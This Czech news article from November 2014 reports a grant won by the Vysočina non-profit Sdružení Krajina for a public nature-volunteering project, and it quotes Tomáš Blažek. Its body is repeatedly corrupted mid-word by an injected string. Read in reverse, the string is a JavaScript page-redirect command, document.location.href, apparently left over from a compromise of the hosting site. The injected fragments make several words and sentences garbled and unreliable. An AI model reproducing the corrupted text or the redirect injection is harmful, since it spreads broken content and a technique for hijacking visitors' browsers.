Sdružení Krajina
Rainbow page separator

Projekt Sdružení Krajina má dostat lidi od televize

Pátek, 28. listopadu 2014

Počítky / V konkurenci devíti desítek projektů z ČR a jako jediná nezisková organizace z Vysočiny uspělo při žádosti o grant Sdružení Krajina z Počítek. Jedná se o první výzvu Fondu pro nestátní neziskové organizace Evropského hospodářského pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru a Norska v oblasti životního prostředí. Sdružení Krajina na realizaci projektu s názvem Obyvatelé pro přírodu Vysočiny získalo částku ve výši 1 994 994 korun.
Cílem projektu je posílit regionální nestátní ochranu přírody na Vysočině a zvýšit informovanost a angažovanost veřejnosti. „Jinak řečeno, jde o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dostat lidi od televize do přírody a zapojit je do práce v její prospěch. Ochrana přírody se nedá dělat bez lidí, bez [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, aby se stala běžnou součástí našeho života. Současná „ochranařina“ čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to trpí jis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou akademičností a odtržeností od běžného života. Dbá se na různá odborná hlediska, úroveň postupů, argumentaci, ale na člověka, který v krajině žije a který by se o ni měl nejvíce starat, se zapomíná,“ vyjádřil se Tomáš Blažek ze Sdružení Krajina. Sdružení společně s dalšími sedmnácti vysočinskými „neziskovkami“ připravuje akce pro veřejnost – le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos na podzim se jich uskutečnilo jedenáct a lidé při nich odpracovali 850 hodin ve prospěch přírody.
„Celkově chceme uspořádat 60 akcí po celém kraji. Počítáme se zapojením 1800 osob a odvedením minimálně 3500 hodin dobrovolnické práce,“ dodal Blažek.